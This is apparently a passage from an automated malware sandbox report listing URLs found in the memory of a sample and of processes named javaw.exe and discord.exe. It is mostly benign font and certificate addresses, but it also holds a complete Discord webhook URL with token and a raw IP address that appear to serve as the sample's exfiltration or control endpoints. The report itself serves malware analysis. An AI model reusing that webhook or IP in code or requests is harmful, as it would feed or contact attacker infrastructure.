    http://repository.swisssign.com/Kjavaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://www.chambersign.org1javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://repository.swisssign.com/0javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://www.fontbureau.com/designersS3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.328505769.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.329922047.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.329863635.0000000006342000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          https://ocsp.quovadisoffshore.comjavaw.exe, 00000001.00000002.581342306.000000000A34A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://policy.camerfirma.comSjavaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.certplus.com/CRL/class3P.crl0javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.sajatypeworks.comS3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.ascendercorp.com/typedesigners.html7S3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.founder.com.cn/cn/cTheS3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.jiyu-kobo.co.jp/8S3zoj9Uts0.exe, 00000000.00000003.325729196.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.sakkal.cominS3zoj9Uts0.exe, 00000000.00000003.327421985.0000000006349000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.certplus.com/CRL/class2.crl0javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://23.94.99.1194S3zoj9Uts0.exe, 00000000.00000002.577854090.000000000249B000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		low
          http://www.jiyu-kobo.co.jp/.S3zoj9Uts0.exe, 00000000.00000003.326796781.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.galapagosdesign.com/DPleaseS3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.ascendercorp.com/typedesigners.htmlS3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.sakkal.comdS3zoj9Uts0.exe, 00000000.00000003.327421985.0000000006349000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.urwpp.deDPleaseS3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.zhongyicts.com.cnS3zoj9Uts0.exe, 00000000.00000003.324712938.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameS3zoj9Uts0.exe, 00000000.00000002.577854090.000000000249B000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000004.00000002.577897163.000000000240F000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://policy.camerfirma.com0javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.0000000004DFE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.00000000049FB000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.jiyu-kobo.co.jp/XS3zoj9Uts0.exe, 00000000.00000003.325729196.0000000006314000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.certplus.com/CRL/class2.crljavaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://bugreport.sun.com/bugreport/javaw.exe, 00000001.00000002.581342306.000000000A1D5000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://java.oracle.com/javaw.exe, 00000001.00000002.581342306.000000000A1E2000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://null.oracle.com/javaw.exe, 00000001.00000002.581342306.000000000A34A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.330568385.0000000015D12000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.588080129.0000000015D21000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.364579973.00000000158C0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.364983883.00000000158C0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.365248645.00000000158E3000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://www.jiyu-kobo.co.jp/JS3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326796781.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.jiyu-kobo.co.jp/CS3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.come.comS3zoj9Uts0.exe, 00000000.00000002.582451232.0000000006310000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://cps.chambersign.org/cps/chambersroot.htmljavaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.carterandcone.comlS3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.certplus.com/CRL/class3P.crljavaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.com/designers/frere-user.htmlS3zoj9Uts0.exe, 00000000.00000003.329046284.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.329015805.0000000006342000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://crl.securetrust.com/STCA.crljavaw.exe, 00000005.00000002.577426840.00000000049FB000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.jiyu-kobo.co.jp/Y0/S3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326796781.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://crl.xrampsecurity.com/XGCA.crl0javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.founder.com.cn/cn2S3zoj9Uts0.exe, 00000000.00000003.324091059.0000000006323000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.quovadis.bm0javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.certplus.com/CRL/class2.crlk3Gjavaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.jiyu-kobo.co.jp/hS3zoj9Uts0.exe, 00000000.00000003.325729196.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.jiyu-kobo.co.jp/dS3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326796781.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://policy.camerfirma.comsjavaw.exe, 00000005.00000002.577426840.00000000049FB000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    http://cps.chambersign.org/cps/chambersroot.html#javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://canary.discord.com/api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXS3zoj9Uts0.exe, 00000000.00000000.309170814.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, S3zoj9Uts0.exe, 00000000.00000002.577854090.00000000024BE000.00000004.00000800.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000002.577854090.0000000002441000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000004.00000002.577897163.00000000023BA000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000004.00000002.577897163.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://en.wikipedia.XsS3zoj9Uts0.exe, 00000000.00000003.324638231.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.324656060.0000000006345000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fontbureau.com/designersGS3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.jiyu-kobo.co.jp/jp/CS3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326796781.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cn/bTheS3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/1S3zoj9Uts0.exe, 00000000.00000003.328458739.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.328479178.0000000006344000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.328505769.0000000006342000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.comodS3zoj9Uts0.exe, 00000000.00000002.582451232.0000000006310000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://cps.chambersign.org/cps/chambersroot.html0javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/jp/.S3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.tiro.comS3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://crl.securetrust.com/STCA.crl3N?javaw.exe, 00000001.00000002.577304920.0000000004DFE000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://policy.camerfirma.comjavaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.goodfont.co.krS3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://crl.securetrust.com/STCA.crl0javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.00000000049FB000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersTS3zoj9Uts0.exe, 00000000.00000003.329809041.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.328505769.0000000006342000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://canary.discord.comS3zoj9Uts0.exe, 00000000.00000002.577854090.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000004.00000002.577897163.0000000002425000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.typography.netDS3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmS3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comS3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.quovadisglobal.com/cps0javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crljavaw.exe, 00000001.00000002.581342306.000000000A34A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designersxS3zoj9Uts0.exe, 00000000.00000003.333786625.0000000006342000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designerswS3zoj9Uts0.exe, 00000000.00000003.329600210.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.329628497.0000000006342000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fonts.comS3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.sandoll.co.krS3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.zhongyicts.com.cn7r#S3zoj9Uts0.exe, 00000000.00000003.324712938.0000000006342000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ocsp.quovadisoffshore.com0javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sakkal.comS3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/jp/XS3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326796781.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://canary.discord.com4S3zoj9Uts0.exe, 00000000.00000002.577854090.00000000024BE000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000004.00000002.577897163.000000000240F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://repository.swisssign.com/javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.chambersign.orgjavaw.exe, 00000001.00000002.581342306.000000000A34A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://23.94.99.119S3zoj9Uts0.exe, 00000000.00000002.577854090.000000000249B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://crl.xrampsecurity.com/XGCA.crljavaw.exe, 00000001.00000002.581342306.000000000A34A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.apache.org/licenses/LICENSE-2.0S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.324656060.0000000006345000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.comS3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://canary.discord.comS3zoj9Uts0.exe, 00000000.00000002.577854090.00000000024BE000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000004.00000002.577897163.000000000240F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://cps.chambersign.org/cps/chambersroot.htmlkjavaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/jp/oS3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326796781.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
